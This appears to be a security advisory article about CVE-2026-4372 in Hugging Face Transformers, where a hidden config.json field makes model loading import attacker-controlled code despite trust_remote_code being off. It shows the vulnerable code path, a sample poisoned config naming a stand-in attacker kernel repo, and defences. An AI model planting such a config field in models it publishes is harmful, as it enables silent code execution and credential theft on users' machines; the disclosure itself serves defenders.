system: OPERATIONAL
← back to all hacks
SUPPLY CHAIN CRITICAL NEW

Transformers config injection: silent RCE that walks past trust_remote_code

CVE-2026-4372, disclosed June 4, 2026, lets a single config.json field run attacker code on a routine from_pretrained() call — bypassing trust_remote_code=False in Hugging Face Transformers.

2026-06-10 // 7 min affects: huggingface-transformers, kernels

What is this?

CVE-2026-4372 is a remote code execution vulnerability in Hugging Face’s transformers library, disclosed publicly on June 4, 2026 by Yotam Perkal of Pluto Security and reported the same day by CSO Online. It lets an attacker run arbitrary Python on anyone who loads a poisoned model with the standard from_pretrained() call — without the victim ever setting trust_remote_code=True.

The trigger is a single field in a model’s config.json. There are no warnings, no consent prompts, and no unusual log entries: the code executes inside the library before from_pretrained() even returns. NVD published the CVE on May 24, 2026 at a CVSS 3.0 base score of 7.8 (High), classified as CWE-1066. Pluto’s blog notes they originally submitted it as Critical; Hugging Face reduced the score to High because exploitation depends on an optional package being present.

How it works

The bug is the intersection of three independent design decisions, none dangerous alone. Pluto traced the full chain; CSO Online corroborated it with the maintainers’ fix.

First, when transformers parses a downloaded config.json, a generic loop in configuration_utils.py stamps every key-value pair onto the config object via setattr, with no allowlist and no distinction between public parameters and private, underscore-prefixed internal attributes:

# configuration_utils.py — untrusted JSON -> object attributes
for key, value in kwargs.items():
    setattr(self, key, value)   # no allowlist, no validation

Second, one of those internal attributes — _attn_implementation_internal — controls which attention kernel the model uses. Since transformers v4.50.0 (the “Hub Kernels” feature), a value shaped like owner/repo is treated as a reference to a downloadable kernel package on the Hub. The dispatch path in hub_kernels.py accepts any owner/repo string and imports it:

# hub_kernels.py (simplified) — any owner/repo string is fetched and imported
def is_kernel(attn_implementation):
    return re.search(r"^[^/:]+/[^/:]+...$", attn_implementation) is not None
# -> get_kernel() -> downloads the Hub package -> importlib import

Third, that import is unsandboxed: no code signing, no integrity check, no prompt. Importing a Python package runs its __init__.py. So an attacker publishes a normal-looking model whose config.json includes one extra line:

{
  "model_type": "llama",
  "architectures": ["LlamaForCausalLM"],
  "_attn_implementation_internal": "attacker-acct/optimized-attn-kernel"
}

When a victim runs AutoModelForCausalLM.from_pretrained("attacker-acct/finance-llama-7b"), the library downloads and imports the attacker’s package, executing whatever lives in its __init__.py at the user’s privilege level. Stub functions in that package let model loading finish normally, so nothing looks wrong.

Crucially, the trust_remote_code=False default never enters the picture — the library’s own sanitizers covered the public attn_implementation field and stripped _attn_implementation_internal on the write path, but never gated it on the read path from untrusted JSON. The front door was locked; the back door was open.

Why it matters

transformers is one of the most-installed Python packages in existence: per Pluto, 2.2B+ total PyPI installs and ~146M downloads per month. The vulnerable code path was introduced in v4.56.0 (August 29, 2025) and removed in v5.3.0 (March 4, 2026) — a roughly 187-day exposure window during which Pluto measured ~232 million downloads of vulnerable versions (4.56.0–5.2.x).

Exploitation requires the optional kernels package to be installed — a real limiting factor, but a deceptive one. kernels ships with transformers[all], with Hugging Face’s reference Dockerfiles, and with most GPU-accelerated inference setups. As Pluto put it, the people most likely to have it are exactly the high-value targets: enterprise ML platforms, CI/CD pipelines that call from_pretrained() automatically, and GPU clusters holding cloud credentials, training data, and model artifacts. A single compromised model load can yield AWS keys, SSH keys, .env secrets and Kubernetes configs, then lateral movement.

This is not theoretical. CSO Online notes a malicious repo posing as an OpenAI “Privacy Filter” model reached the Hub’s #1 trending spot and 244,000 downloads within 18 hours before takedown — and that attack still required the victim to manually run a loader script. CVE-2026-4372 removes even that step. It also rhymes with CVE-2025-32434 (April 2025), the PyTorch torch.load flaw that achieved RCE despite weights_only=True — the same shape of bug: a documented “safe” mode leaking a code-execution primitive through an adjacent path the flag never covered.

A second lesson is about visibility, not patch speed. Hugging Face fixed the bug fast (10 days from report to v5.3.0), but the fix shipped as a one-line “security vulnerability” bullet in routine release notes; the CVE landed on NVD 81 days later. Per Pluto’s telemetry, vulnerable versions were still being downloaded 7–8 million times per week — about a quarter of weekly installs — months after the patch. A patch without a loud advisory does not protect defenders who never learned they needed it.

Defenses

If you use transformers, upgrade to v5.3.0 or later now, and check whether any pinned environment is still on 4.56.0–5.2.x. Both Pluto and CSO confirm vulnerable versions remain heavily downloaded.

Audit your configs. Search any cached or downloaded config.json for _attn_implementation_internal (and, post-fix, _experts_implementation_internal). Their presence in a Hub-sourced config is a red flag. More broadly, reject configs carrying unexpected underscore-prefixed fields before loading.

Treat model loading as a code-execution surface, regardless of “safe” flags. This is the durable takeaway. Run from_pretrained() (and torch.load()) inside isolated, monitored containers with no host credentials, no outbound network egress, and minimal filesystem access. Don’t let a process that loads untrusted models also hold production secrets.

Verify provenance. Prefer models from known publishers; for unknown ones, tools like Cisco’s open-source Model Provenance Kit can fingerprint weights, tokenizers and architecture metadata against known base-model families.

The v5.3.0 fix itself is defense-in-depth: it denylists _attn_implementation_internal and _experts_implementation_internal in the setattr loop (PR #44395), and now requires trust_remote_code=True for any kernel repo outside the official kernels-community org. As Pluto notes, a denylist is only as good as the developer’s foresight — an allowlist of permitted config fields would be the more robust long-term design.

Status

ItemDetail
CVECVE-2026-4372 (CWE-1066), CVSS 3.0 base 7.8 High (NVD)
Affectedtransformers 4.56.0 – 5.2.x with the optional kernels package
Introducedv4.56.0, 2025-08-29 (Hub Kernels dispatch refactor)
Fixedv5.3.0, 2026-03-04 (PR #44395)
Reported / Disclosedhuntr report 2026-02-23; NVD publication 2026-05-24; public write-up 2026-06-04
DiscovererYotam Perkal, Pluto Security
ActionUpgrade to ≥ 5.3.0; audit configs; sandbox model loading

Sources